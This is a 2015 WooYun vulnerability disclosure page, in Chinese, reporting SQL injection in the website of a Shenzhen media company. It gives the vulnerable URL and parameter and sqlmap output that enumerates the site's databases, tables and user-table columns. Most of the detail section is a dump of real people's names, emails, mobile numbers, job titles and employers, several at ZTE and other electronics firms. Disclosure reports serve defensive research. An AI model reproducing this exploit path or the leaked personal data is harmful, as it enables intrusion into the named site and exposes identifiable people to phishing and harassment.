深圳思锐达传媒有有限公司官网存在sql注入漏洞，暴露大量信息（主要都是互联网电子界的巨头）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137643

漏洞标题：深圳思锐达传媒有有限公司官网存在sql注入漏洞，暴露大量信息（主要都是互联网电子界的巨头）

漏洞作者：路人甲

提交时间：2015-08-28 17:41

修复时间：2015-10-12 17:42

公开时间：2015-10-12 17:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-28：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

深圳思锐达传媒有有限公司官网存在sql注入漏洞，暴露大量信息（主要都是互联网电子界的巨头）

详细说明：

漏洞页面：http://www.siridamedia.com/news_detail.php?id=489

web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[16:02:13] [INFO] fetching database names
[16:02:13] [INFO] the SQL query used returns 4 entries
[16:02:13] [INFO] retrieved: "information_schema"
[16:02:13] [INFO] retrieved: "ensirida2012"
[16:02:13] [INFO] retrieved: "sirida2012"
[16:02:14] [INFO] retrieved: "test"
available databases [4]:                                                       
[*] ensirida2012
[*] information_schema
[*] sirida2012
[*] test

web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[16:02:25] [INFO] fetching current database
current database:    'sirida2012'
[16:02:25] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.siridamedia.com'
Database: sirida2012                                                           
[28 tables]
+----------------------+
| e_cla                |
| e_reg                |
| exhibition_config    |
| exhibition_extends   |
| exhibition_signup    |
| fch_city             |
| fch_province         |
| qiyun_about_bigcla   |
| qiyun_about_smallcla |
| qiyun_bb             |
| qiyun_bigcla         |
| qiyun_car            |
| qiyun_car_more       |
| qiyun_cla            |
| qiyun_down           |
| qiyun_down_cla       |
| qiyun_gg             |
| qiyun_job            |
| qiyun_ly             |
| qiyun_news           |
| qiyun_pic            |
| qiyun_pt             |
| qiyun_smallcla       |
| qiyun_smallcla1      |
| qiyun_syfw           |
| qiyun_title          |
| qiyun_user           |
| qiyun_youqing        |

Database: sirida2012                                                           
Table: qiyun_user
[4 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| cla    | int(11) |
| id     | int(11) |
| psd    | text    |
+--------+---------+

| id   | uid  | exhid | sex | fax             | job                                        | city | name                  | email                               | weibo | phone           | branch                            | work             | wechat  | zone   | mobile         | pubdate | Keysight | province | Forum_domain | company_name                                     | company_domain                                                              | company_industry                                |
+------+------+-------+-----+-----------------+--------------------------------------------+------+-----------------------+-------------------------------------+-------+-----------------+-----------------------------------+------------------+---------+--------+----------------+---------+----------+----------+--------------+--------------------------------------------------+-----------------------------------------------------------------------------+-------------------------------------------------+
[16:13:35] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 711  | 784  | 100   | 先生  | 0769-22408481   | 主任                                         | NULL | 顾小虎                   | yunjian86318@163.com                | NULL  | 0769-22408481   | 招商部                               | 市场推广             | <blank> | NULL   | 15370989520    | 0       | NULL     | NULL     | NULL         | 江苏海安高新区                                          | 家用电器,汽车电子设备,安防与监控系统                                                         | 政府/协会/媒体服务                                      |
| 712  | 179  | 100   | 先生  | 0755-33372202   | 技术总监                                       | NULL | 康志中                   | szmcudesignzj@163.com               | NULL  | 0755-33372202   | RD                                | CTO/技术总监         | <blank> | NULL   | 13923751149    | 0       | NULL     | NULL     | NULL         | 深圳市华康兴源科技有限公司                                    | 手机,便携式消费类产品,仪器仪表/工控设备                                                       | 系统方案设计公司                                        |
| 713  | 785  | 100   | 先生  | 0755-83207296   | 市场开拓经理                                     | NULL | 王                     | 631140663@QQ.COM                    | NULL  | 0755-83032132   | ICBU                              | 销售               | <blank> | NULL   | 13316824609    | 0       | NULL     | NULL     | NULL         | 深圳长城开发科技                                         | 通信与网络设备,便携式消费类产品,仪器仪表/工控设备,医疗电子设备                                           | 电子整机/EMS制造                                      |
| 714  | 786  | 100   | 先生  | 021-61651266    | 经理                                         | NULL | 李剑                    | lijian@huaqin.com                   | NULL  | 021-61651266    | 市场部                               | 销售               | <blank> | NULL   | 13851981514    | 0       | NULL     | NULL     | NULL         | 上海华勤                                             | 手机                                                                          | 电子整机/EMS制造                                      |
| 715  | 787  | 100   | 先生  | 0574-62538076   | 市场产品经理                                     | NULL | 汪银辉                   | wyh@sunnyoptical.com                | NULL  | 0574-62550667   | 市场部                               | 产品线管理及市场推广       | <blank> | NULL   | 13566090508    | 0       | NULL     | NULL     | NULL         | 宁波舜宇光电信息有限公司                                     | 手机                                                                          | 分立元器件/模组件                                       |
| 716  | 788  | 100   | 先生  | 0755-86360201   | 工程师                                        | NULL | 管小鹏                   | guan.xiaopeng@zte.com.cn            | NULL  | 0755-86360200   | 软件一部                              | 研发工程师            | <blank> | NULL   | 13590259100    | 0       | NULL     | NULL     | NULL         | 中兴移动通信有限公司                                       | 手机                                                                          | 电子整机/EMS制造                                      |
| 717  | 789  | 100   | 先生  | 755-85294261    | 技术经理                                       | NULL | 胡                     | hxx@csjoptical.com                  | NULL  | 755-85294261    | 研发                                | 市场推广             | <blank> | NULL   | 15825587620    | 0       | NULL     | NULL     | NULL         | 舜宇光学                                             | 手机                                                                          | 分立元器件/模组件                                       |
| 718  | 790  | 100   | 先生  | 0755-82879022   | sales manager                              | NULL | vincent               | vincent@sidaelec.com                | NULL  | 0755-82874645   | sales                             | 销售               | <blank> | NULL   | 13603005328    | 0       | NULL     | NULL     | NULL         | 思达电子（香港）有限公司                                     | 手机                                                                          | 行业服务                                            |
| 719  | 791  | 100   | 先生  | 0755-22216649   | 总经理                                        | NULL | 张世波                   | 1192067796@qq.com                   | NULL  | 0755-22216649   | 销售                                | 研发工程师            | <blank> | NULL   | 13086561551    | 0       | NULL     | NULL     | NULL         | 深圳市逍遥电子商务有限公司                                    | 手机,家用电器,便携式消费类产品,医疗电子设备,智能玩具/教育设备,安防与监控系统                                   | 分销商                                             |
| 720  | 792  | 100   | 先生  | 0755-26781728   | DFX总监                                      | NULL | 余宏发                   | yu.hongfa@zte.com.cn                | NULL  | 0755-26781748   | DFX                               | DFX总监            | <blank> | NULL   | 13312902396    | 0       | NULL     | NULL     | NULL         | 中兴通讯                                             | 通信与网络设备,手机                                                                  | 系统方案设计公司                                        |
| 721  | 794  | 100   | 先生  | 0755-26774951   | 产品总监                                       | NULL | 黄智                    | huang.zhi1@zte.com.cn               | NULL  |

这里只做证明，只截取了部分信息，里面不乏360等公司的

漏洞证明：

如上，得到这些信息还是蛮有用的，有礼物没

修复方案：

过虑

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137643

漏洞标题：深圳思锐达传媒有有限公司官网存在sql注入漏洞，暴露大量信息（主要都是互联网电子界的巨头）

相关厂商：深圳思锐达传媒有有限公司

漏洞作者：路人甲

提交时间：2015-08-28 17:41

修复时间：2015-10-12 17:42

公开时间：2015-10-12 17:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137643

漏洞标题：深圳思锐达传媒有有限公司官网存在sql注入漏洞，暴露大量信息（主要都是互联网电子界的巨头）

相关厂商：深圳思锐达传媒有有限公司

漏洞作者： 路人甲

提交时间：2015-08-28 17:41

修复时间：2015-10-12 17:42

公开时间：2015-10-12 17:42

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0137643"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云